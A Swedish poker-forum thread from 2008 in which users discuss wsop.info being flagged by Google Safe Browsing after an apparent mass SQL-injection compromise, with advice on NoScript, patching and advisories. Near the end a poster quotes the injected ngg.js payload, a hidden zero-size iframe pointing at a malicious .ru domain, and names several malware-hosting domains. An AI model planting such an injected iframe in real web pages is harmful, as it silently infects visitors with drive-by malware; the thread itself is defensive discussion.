WSOP.info - säkerhetsrisk enligt mozilla?

[TotalFarsa]

Mozilla Firefox uppdaterades precis när jag startade upp datorn och då jag surfade in på wsop.info fick jag följande varning (kom inte in på sidan):

 

Angreppsrisk!

 

Webbplatsen http://www.wsop.info har rapporterats göra angrepp på datorer och har därför blockerats enligt dina säkerhetsinställningar.

 

Angripande webbplatser försöker installera program för att stjäla privata uppgifter, använda din dator för att angripa andras, eller för att skada ditt system.

 

Vissa angripande webbplatser sprider medvetet skadlig programvara, men många är också komprometterade utan ägarens kännedom eller tillåtelse.

 

Följande får jag fram när jag klickar på länken "Varför stoppades den här sidan":

 

Safe Browsing

Diagnostic page for http://www.wsop.info/se/new/

 

What is the current listing status for http://www.wsop.info/se/new/?

 

Site is listed as suspicious - visiting this web site may harm your computer.

 

What happened when Google visited this site?

 

Of the 1 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 07/17/2008, and the last time suspicious content was found on this site was on 07/17/2008.

 

Malicious software includes 2 scripting exploit(s). Successful infection resulted in an average of 1 new processes on the target machine.

 

Malicious software is hosted on 3 domain(s), including tctcow.com, usabnr.com, pyttco.com.

 

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including usabnr.com.

 

Has this site acted as an intermediary resulting in further distribution of malware?

 

Over the past 90 days, http://www.wsop.info/se/new/ did not appear to function as an intermediary for the infection of any sites.

 

Has this site hosted malware?

 

No, this site has not hosted malicious software over the past 90 days.

 

How did this happen?

 

In some cases, third parties can add malicious code to legitimate sites, which would cause us to show the warning message.

 

Next steps:

 

* Return to the previous page.

* If you are the owner of this web site, you can request a review of your site using Google Webmaster Tools. More information about the review process is available in Google's Webmaster Help Center.

 

Är det Firefox som spökar med mig eller är det faktiskt något skevt med wsop?

[Loveless]

Nja, verkar ju vara en tjänst hos google som hittar något mystiskt i några banners. Har sett det här hos andra också, t.ex. varnades jag för dagenstv.com för ett tag sedan, men det verkar fungera fint nu.

[TotalFarsa]

Ok Loveless men jag avvaktar Brainslicers dom

[PokerPlogg]

varje gång jag besöker wsop.info ger mitt anivirusprogram trojanvarning.

[Matfrid]

Det kan nog vara turkiska script kiddies som håller på med SQL injections. Dessa nya atacker nämns på många håll, och tctcow.com tillhör de som svartlistas. .

 

Det här är ju mycket vanligt. På flashback publiceras ofta listor på svenska websidor som är sårbara för sql injections, och det var ju en våg tidigare i år då hundratusentals websidor infekterades den vägen.

 

[edit: första länken funkar inte eftersom den inte är tillåten i forumet]

[brainslicer]

Som matfrid säger, finns hur många seriösa sajter som helst som drabbas av detta om dom är sårbara... och inte bara FB manuella angrepp, utan automatiserade mot kända sårbarheter...

 

Jag gick in med FF3 + NoScript.. och då ser jag bl.a. misstänkta script som försöker köras från:

 

usabnr.com

pyttco.com

 

iaf den första kommer jag ihåg är elakt java script...pyttco vet jag inte, måste kolla om jag orkar

gå inte in på dom bara...

[dragonDonk]

Troligen SQL -> Trojan

 

Med största sannolikhet var det därifrån som jag fick min BankTrojan.

 

Dom specialiserar sig på SEB-intrång.

 

Jag har haft lite besök där. Så avvakta wsop.info tills dom blivit av med SQL injection etc.

 

Lite sjukt vad hackers blivit duktiga, snart kan man väl knappt surfa =)

[brainslicer]

där lite mera

What happened when Google visited this site?

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=sv-SE&site=http://www.wsop.info/se/new/index.asp

Of the 1 pages we tested on the site over the past 90 days, 1 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 07/17/2008, and the last time suspicious content was found on this site was on 07/17/2008.

Malicious software includes 2 scripting exploit(s). Successful infection resulted in an average of 1 new processes on the target machine.

Malicious software is hosted on 3 domain(s), including

tctcow.com

,

usabnr.com

,

pyttco.com

.

1 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including

usabnr.com

.

 

edit: såg att TotalFarsa hade detta i första inlägget nu också...

[pink-piraya]

Jag gick in med FF3 + NoScript..

 

Vad är NoScript ? Någon inställning i FF3 eller?

[brainslicer]

Vad är NoScript ? Någon inställning i FF3 eller?

Tilläggsprogram till FF som spärrar script, kommer du in på tex pokerforum.nu kan man manuellt tillåta att script från pokerforum.nu körs... skulle pf bli drabbat på liknande vis så spärrar NoScript script från andra sajter att köras utan din vetskap. (i detta fall från: tctcow.com, usabnr.com, pyttco.com.)

 

Man är dock fortfarande sårbart mot att dom lyckas plantera själva scriptet på pf.nu servern(eftersom man tillåter script från pf.nu att köras) ...vilket dock är betydligt svårare...

 

http://noscript.net/

 

 

NoScript in action on wsop.info - klicka för större bild(om ni vågar )

[brainslicer]

Till wsop.info owner(och varför inte andra websajt ägare)

 

http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1319830,00.html?track=sy160

 

Tips for SQL injection protection

Microsoft recently identified tools to help software developers, security pros and others on the software development team serve up more secure code and defend against SQL injection attacks. Over the last several months researchers have been tracking the attacks, which appear to be automated, using a number of hacker toolkits that can be purchased on the black market. In this podcast, Scott Matsumoto, a secure coding expert with Cigital Inc. explains the tools available and other ways companies can scan their Web-based software for errors that leave it vulnerable to attack.

http://www.f-secure.com/2008/1/index.html

Criminal Injections

 

During the first half of 2008 we've seen online criminals using powerful tools to locate websites using SQL servers hosting insecure pages. The SQL servers themselves are not insecure; the tools seek out web forms that allow unchecked/unfiltered malicious input. Using the vulnerable forms these tools automatically injected the site with malicious code.

More and more web sites are using database back-ends to make them faster and more dynamic. From a security perspective, this means that it's crucial to verify what information gets stored in or requested from those databases — especially if a web site allows users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, and so on. Unless that data is sanitized before it gets saved, it's not possible to control what the web site will show to the users. SQL injection is all about exploiting weaknesses in these controls.

Such mass SQL injection attacks are increasing in number and we're seeing more domains being injected and used to host the attack files. Tens of thousands of hacked sites are actively affected. Millions have been hacked. We believe that there is now more than one criminal group using a set of different automated tools to inject malicious code. There is no longer any such thing as a "trusted site". Any site running a vulnerable form is at risk.

The SQL attacks inject IFrames that attempt to use several exploits to infect visiting computers. Infection by drive-by-download is more common than ever before.

[brainslicer]

där lite att fundera på när man surfar och klickar på länkar:

 

google that "<script src=http://???.???/ngg.js>"

(men gå inte in på svaren)

http://www.google.se/search?hl=sv&q=%3Cscript+src%3Dhttp%3A%2F%2F%3F%3F%3F.%3F%3F%3F%2Fngg.js%3E&btnG=S%C3%B6k&meta=

- 357.000 svar med sidor innehållande ngg.js-koden som pekar på scriptet på nån domän

(vete fan hur google räknar, ibland blir det "Resultat 1 - 10 av ungefär 734 000" på samma googling många är det iaf)

 

 

google: "<script src=http://???.???/ngg.js> inurl:.se"

(men gå inte in på svaren)

http://www.google.se/search?q=%3Cscript+src%3Dhttp%3A%2F%2F%3F%3F%3F.%3F%3F%3F%2Fngg.js%3E+inurl%3A.se

- på .se domänen finns 2120 sidor

 

då talar vi bara om ngg.js scriptet ännu...

 

edit: måste väl tillägga att av alla dessa svar så är ju så gott som alla seriösa sidor som blivit manipulerade

[IngeRik]

bör man göra något speciellt om man varit inne på wsop?

[brainslicer]

bör man göra något speciellt om man varit inne på wsop?

Det är ju hopplöst att sia om, exploiten kan ju dagligen ändras, liksom "payloaden" som laddas ner. Är du uppdaterad och har script avstängda så är ju risken inte så stor kanske...men aldrig kan man vara säker, dagligen upptäcks ju nytt.

 

Du kan kolla hos secunia tex. hur många program med kända sårbarheter du har på datorn

+ Läsa att tex MS Word och MS Access just nu är

Extremely critical, The vulnerability is currently being actively exploited.

Scanna, undersök med olika verktyg och var uppmärksam på konstigt beteende, antar jag... Lär dig använda netstat kommandot och HiJackThis och likande verktyg, mao lär dig känna din dator.

 

åter en gång => poker only dator

[MrFroggyX]

Men hur funkar det med UAC i Vista? Om jag går till wsop.info och dom försöker köra något script eller annat skit. För att det ska vara skadligt för min dator måste jag inte trycka accept eller godkänn? Eller laddas scripten in automatiskt. Jag kör IE7 med deafult säkerhet, AVG, windows firewall och NAT router.

 

EDIT:

Är så jävla trött med allt trojaner, spyware, äckel, keyloggers, msn hackningar osv osv osv..

Jag vill ju bara lite lite poker. Men nu har man ju det är skiten i bakhuvudet hela tiden. Tänk om man har en trojan på datorn osv osv. Och även om man inte har det så är det folk med superuser konto som snor ens pengar. FAN. Ska nog försöka ta och investera i en pokerdator. Fast det blir ju trassligt det med. När man flyger ska man släppa omkring på två datorer. Funkar ju inte.

 

Eller kanske skaffa en MAC och köra allt på pokern i bootcamp i vista och sedan allt det andra i OSX. Hur säkert är det? Det borde ju bli som man har två datorer fast i en. Kan man göra så att OSX och Vista inte får tillgång till varandras filer om man kör bootcamp?

 

Lite sjukt att det räcker att gå till en hemsida och så får man något skit på datorn. Wsop.info har jag varit inne på massa, det blir att installera om vista igen.. SUCK.

[brainslicer]

Men hur funkar det med UAC i Vista? Om jag går till wsop.info och dom försöker köra något script eller annat skit. För att det ska vara skadligt för min dator måste jag inte trycka accept eller godkänn? Eller laddas scripten in automatiskt. Jag kör IE, AVG, windows firewall och NAT router.

 

EDIT:

Är så jävla trött med allt trojaner, spyware, äckel, keyloggers, msn hackningar osv osv osv..

Jag vill ju bara lite lite poker. Men nu har man ju det är skiten i bakhuvudet hela tiden. Tänk om man har en trojan på datorn osv osv. Och även om man inte har det så är det folk med superuser konto som snor ens pengar. FAN. Ska nog försöka ta och investera i en pokerdator. Fast det blir ju trassligt det med. När man flyger ska man släppa omkring på två datorer. Funkar ju inte.

 

Eller kanske skaffa en MAC och köra allt på pokern i bootcamp i vista och sedan allt det andra i OSX. Hur säkert är det? Det borde ju bli som man har två datorer fast i en. Kan man göra så att OSX och Vista inte får tillgång till varandras filer om man kör bootcamp?

 

Lite sjukt att det räcker att gå till en hemsida och så får man något skit på datorn. Wsop.info har jag varit inne på massa, det blir att installera om vista igen.. SUCK.

 

 

 

Beror på vilken/vilka sårbarheter som utnyttjas, antivirus/brandväggar osv skyddar inte mot sårbarheter, det som skyddar är att hålla datorn uppdaterad ... men ibland finns det ingen uppdatering tillänglig:

http://secunia.com/advisories/30975/'>http://secunia.com/advisories/30975/

http://secunia.com/advisories/30883/'>http://secunia.com/advisories/30883/

...ibland är inte ens sårbarheten känd för säkerhetsföretagen.

 

hur sårbarheten drabbar en är ju olika,.. ibland är det mailprogrammet, ibland webbläsaren, andra gånger nån plugin, wmp, vlc, word, flash, java, activeX, quicktime, osv osv osv som har programmeringsfel som kan utnyttjas.

 

vissa kräver att man godkänner nåt men inte alla...som sagt, beror på, att du luras installera en codec eller godkänna en java applet är ju inte samma sak som en sårbarhet

 

Om du läser denna artikel: Illustrerar bra var största problemet ligger: dvs i mjukvaror man installerar/inte uppdaterar. Alla OS med deffault inställningar verkar vara starka så länge man inte hunnit börja installera flash, java, quicktime, vlc, osv osv osv osv....

 

http://opensource.idg.se/2.1014/1.153103

Ubuntu spöar Vista och Mac i prestigefylld hackartävling

 

Efter tre dagars tävlan under hackartävlingen Pwn2own har både Windows Vista och Apples Leopard fått se sig bli "ägda". Ende kombatanten som höll tiden ut var Ubuntu.

 

Det var under säkerhetskonferensen CanSecWest som hackartävlingen Pwn2own gick av stapeln. En tävling som gick ut på att bryta sig in i en Ubuntu 7.10, en fullt patchad Windows Vista med service pack 1 och Mac OS X Leopoard.

 

Reglerna var hårda och under första dagen fick de tävlanden bara attackera maskinerna utifrån med en remote exploit-attack - något som alla tre maskinerna stog emot.

 

Andra dagen blev det lite enklare då de fick möjlighet att attackera förinstallerad mjukvara på respektive system.

 

-Macen fick se sig bli hackad under andra dagen då en grupp forskare från Independent Security Evaluators (ISE) visade en tidigare okänd lucka i Apples webbläsare Safari.

- Vi ville spendera så lite tid som möjligt på att komma fram med en exploit (säkerhetslucka) så vi valde Mac OS X, fortsätter han

 

Med Macen ute ur tävlingen återstod bara Windows Vista och Ubuntu 7.10. Hackaren Shane Macaulay som knäckte en Mac(QuickTime exploit) under förra årets tävling koncentrerade sig på att bryta sig in via en brist i Adobe Flash. Han fick hjälp av Alex Sotirov, en säkerhetsforskare från VMware.

 

Innan tävlingen hade Shane förberett en exploit till Windows Vista men som bara fungerade på en ren maskin utan service pack 1 installerat. Med SP1 installerat fungerade inte Shanes kod utan han fick lägga ner fyra extra timmar på att arbeta sig runt det extra skyddet.

 

Det kan tyckas vara en tävling som pekar ut Linux som det säkraste operativet men Macaulay påpekar att hans attack mot Flash kan också användas mot både Mac och Linux. Det kräver bara några extra timmars "tweakande" enligt Macaulay.

 

- Ingen kan göra någonting åt det, eftersom du alltid kommer att installera något som tar sig förbi säkerheten," säger Macaulay

- Om det inte är Java så blir det något annat.

 

sedan kan ju detta vara intressant att läsa också:

http://www.sitic.se/publikationer/namnvart/nytt-cpu-hack-kommer-visas-under-konferans

 

Nytt CPU-hack kommer visas under konferens

 

IT-säkerhetsforskaren Kris Kaspersky kommer under konferensen Hack In The Box som går av stapeln i slutet på Oktober i Malaysia demonstrera kod som via buggar i processorn tar över datorn. Det unika är att det är sårbarheter i själva processorns microkod som utnyttjas och angrepp går att genomföra oberoende av vilket operativsystem som klientdatorn kör.

 

För mer information:

http://www.techworld.com/security/news/index.cfm?newsID=102143&pagtype=all

 

2008-07-14 21:37

summa sumarum: => poker ONLY dator, inte surfa längre än till spelsajterna OCH även då gärna med FF+NoScript...spelsajters/bankers sajter har råkat ut för liknande förut, o kommer garanterat att råka ut för det igen,

skippa flash/java/mediaspelare/im-klienter i den mån det går...vissa sajter kan kräva nåt...(tex Betsson sidan kräver flash vill jag minnas)

 

Problemet med IE är att du kan stänga av scripterna o sånt...MEN då funkar ju knappt nån sida på Internet... just kombon FF+NoScript så kan du tillåta tex Betsson, Svenska Spel osv att köra script från respektive sajt men ändå hindra andra script när nån lyckas manipulera koden på webbsidan.

 

Och slutligen: vad än Loudmouth säger , så rekommenderar jag Secunia PSI http://secunia.com/ för att hålla datorn uppdaterad.

Det var ju ändå det som var största faran och det fanns inget program som skyddar mot sårbarheter.

Och har man nåt mot just Secunia, så har jag för mig att F-secure iaf börjat tillverka ett liknande program. Ta dom för vad dom är, inget skydd, utan en påminnare som underlättar patchande.

[devalanteriel]

Jag tror jag nominerar brainslicer till guldmariekexet för dagens bästa genomgång på forumet...

[brainslicer]

Jag tror jag nominerar brainslicer till guldmariekexet för dagens bästa genomgång på forumet...

 

thx...fast massor med stavfel kan jag tänka mig, rättat nåt säkert 10ggr redan, inte lätt att spela poker och och försöka skriva sånadär inlägg, i just love oneliners

 

 

btw. ingen som kontaktat dom på wsop.info? sidan är fortfarande uppe med koden....

[MrFroggyX]

Brainslicer! Tack så mycket!

Får försöka ta tag i det med en pokerdator. Men det är också struligt. Hur tror du det skulle funka att ha en mac och köra surf osv på OSX och poker i bootcamp med Vista? Om jag får in något skit på OSX kan den ta sig till Vista installationen?

[brainslicer]

Brainslicer! Tack så mycket!

Får försöka ta tag i det med en pokerdator. Men det är också struligt. Hur tror du det skulle funka att ha en mac och köra surf osv på OSX och poker i bootcamp med Vista? Om jag får in något skit på OSX kan den ta sig till Vista installationen?

 

Bättre än att porrsurfa, installera piratkopierade spel osv på ett och samma OS som poker ligger på. Men det är ju inget att rekommendera ändå, att tex riskera att nån lägger upp en ftp server med barnporr på din dator, eller använder den för att attackera andra, spamma osv... bara för att man anser att det andra OS:et är i "säkert" förvar.

[MrFroggyX]

Har dom fixat sidan än? Vågar man gå in på den nu?

[gdaily]

Nix,

 

Norton har varnat mig i en vecka nu för "blockerade intrångsförsök". Jag misstänker att det är deras banners som strular och att allt egentligen är lungt, men jag tänker inte ta risken.

[Legato]

Nix,

 

Norton har varnat mig i en vecka nu för "blockerade intrångsförsök". Jag misstänker att det är deras banners som strular och att allt egentligen är lungt, men jag tänker inte ta risken.

 

Vi är fullt medvetna om att sidan hackats. Det som hänt är precis det brainslicer beskriver. Tyvärr har vi väldigt bristfälliga tekniska resurser, men de som sköter detta jobbar på att hitta en lösning.

 

Givetvis tacksam för ytterligare info om hur de script som ligger och kör drabbar användare, maila gärna sådan info till wsopinfo@gmail.com.

[MrFroggyX]

Men hur kan ni ha sidan uppe? Ni måste såklart stänga ner den tills det är fixat. Tänk på alla som kan bli infekterade med ev stora konsekvenser som följd.

[brainslicer]

Enligt min NoScript försöker mainsidan(wsop.info/se) forfarander iaf köra script från: usabnr.com, pyttco.com(se bilden)

 

Studerar man i sin tur ngg.js-scripten på dessa sajter så anslöt dom i sin tur till: hxxp://vcre.ru respektive hxxp://keje.ru för några dagar sedan...

 

just nu ansluter dom till 4cnw.ru och kc43.ru. Kod från ngg.js:

<iframe src=[b]hxxp://4cnw.ru[/b]/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0></iframe>

alla dessa fyra ryska domäner finns på blocklistor uppdaterade 17/7 och 23/7: http://malwaredomains.com/

 

Diagnostic page for wsop.info/se/

http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=sv-SE&site=http://www.wsop.info/se/

Of the 2 pages we tested on the site over the past 90 days, 2 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 07/17/2008, and the last time suspicious content was found on this site was on 07/17/2008.

 

Malicious software includes 3 scripting exploit(s). Successful infection resulted in an average of 1 new processes on the target machine.

 

2 domain(s) appear to be functioning as intermediaries for distributing malware to visitors of this site, including usabnr.com, pyttco.com.

12/35 AV upptäcker ngg.js scriptet idag(dock är ju inte denna kod som är den riktigt "elaka" i dig självt, den är bara en "mellanhand"):

http://www.virustotal.com/sv/analisis/d2c7d3926eb7caa099715a1b3d0330c6

 

vad som i sin tur händer på dessa ryska domäner som ngg.js scriptet i sin tur länkar till kollade jag inte ;D ..

 

man bör komma ihåg att både scripten och vart dom i sin tur pekar kan ändras när som helst

 

 

 

 

__________________________________

där en artikel hos idg idag:

Ny infekterad sajt upptäckt var femte sekund

http://sakerhet.idg.se/2.1070/1.172223

Antivirusföretaget Sophos rapporterar att sajter infekterade genom SQL-injektion har blivit tre gånger så vanliga jämfört med förra året. Undersökningar har påvisat över 16 000 nya infekterade sajter varje dag, eller en var femte sekund.

 

Det vanligaste infektionssättet visar sig vara så kallad SQL-injektion. En teknik som låter virusmakare plantera trojaner, tangentbordsloggare och liknande programvaror på sajter i syfte att angripa dess besökare.

 

Vanligt är fortfarande också att använda sig av legitima sajter med gott anseende och som besökare känner att de kan lita på. Dessa utgör enligt Sophos omkring 90 procent av de infekterade sajterna. Exempelvis har sajter som ITV, Sony Playstation och en sida om golf på BBC:s sajt alla blivit infekterade vid tidigare tillfällen. Även om sårbarheterna för de tre nämnda sajterna åtgärdats, återstår många andra sajter som ännu inte hunnit få förebyggande uppdateringar genomförda.

edit:

Legato: längst nere i ovanstående artikel fanns väl nån länk om MS verktyg mot sqlinjections(annars hade jag länkat till nåt liknande tidigare i tråden) och ta för guds skull ner sidan(databasen) om ni är medvetna om att den smittar besökare...

 

edit2:

Slarvigt skriven kod som tillåter att besökare/maskar(worms) matar in elaka saker i dom olika rutorna(injekterar) som sedan lagras i databasen(sql-databasen)

Från databasen körs sedan den elaka koden när besökare kommer till sidan.

 

Detta betyder inte att databasen är sårbar, bara att koden som kontrollerar vad som matas in i databasen är slarvigt skriven...

Rise in SQL Injection Attacks Exploiting Unverified User Data Input

http://www.microsoft.com/technet/security/advisory/954462.mspx

These SQL injection attacks do not exploit a specific software vulnerability, but instead target Web sites that do not follow secure coding practices for accessing and manipulating data stored in a relational database. When a SQL injection attack succeeds, an attacker can compromise data stored in these databases and possibly execute remote code. Clients browsing to a compromised server could be forwarded unknowingly to malicious sites that may install malware on the client machine.

So what should you do?

http://www.f-secure.com/weblog/archives/00001427.html

- First of all, search your website logs for the code above and see if you've been hit. If so, clean up your database to prevent your website visitors from becoming infected.

- Second, make sure that all the data you pass to your database is sanitized and that no code elements can be stored there.

- Third, block access to the sites above.

- Fourth, make sure the software you use is patched, F-Secure Health Check (min anm: eller Secunia Software Inspectors)is an easy way to do this.

- Fifth, keep your antivirus solution up-to-date.